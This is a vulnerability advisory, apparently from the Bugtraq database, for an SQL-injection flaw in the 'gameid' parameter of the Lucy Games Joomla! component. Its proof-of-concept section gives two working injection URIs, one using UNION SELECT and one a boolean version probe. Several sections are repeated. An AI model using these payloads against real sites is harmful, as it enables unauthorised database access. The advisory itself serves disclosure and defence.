Joomla! Lucy Games Component 'gameid' Parameter SQL Injection Vulnerability
BID:36334
Info
Joomla! Lucy Games Component 'gameid' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 36334 |
| Class: | Input Validation Error |
| CVE: |
CVE-2009-4619 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 09 2009 12:00AM |
| Updated: | Apr 13 2015 09:06PM |
| Credit: | 599eme Man |
| Vulnerable: |
Lucy Games Lucy Games 1.5.4 |
| Not Vulnerable: | |
Discussion
Joomla! Lucy Games Component 'gameid' Parameter SQL Injection Vulnerability
The Lucy Games component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Lucy Games 1.5.4 is vulnerable; other versions may also be affected.
The Lucy Games component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Lucy Games 1.5.4 is vulnerable; other versions may also be affected.
Exploit / POC
Joomla! Lucy Games Component 'gameid' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/index.php?option=com_lucygames&task=game&gameid=-5371%20union%20all%20select%201,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
http://www.example.com/index.php?option=com_lucygames&task=game&gameid=5371%20and%20substring(@@version,1,1)=5
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/index.php?option=com_lucygames&task=game&gameid=-5371%20union%20all%20select%201,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
http://www.example.com/index.php?option=com_lucygames&task=game&gameid=5371%20and%20substring(@@version,1,1)=5
Solution / Fix
Joomla! Lucy Games Component 'gameid' Parameter SQL Injection Vulnerability
Solution:
The vendor reports that the issue is fixed. Please contact the vendor for details.
Solution:
The vendor reports that the issue is fixed. Please contact the vendor for details.
References
Joomla! Lucy Games Component 'gameid' Parameter SQL Injection Vulnerability
References:
References:
- Lucy Games Homepage (Lucy Games)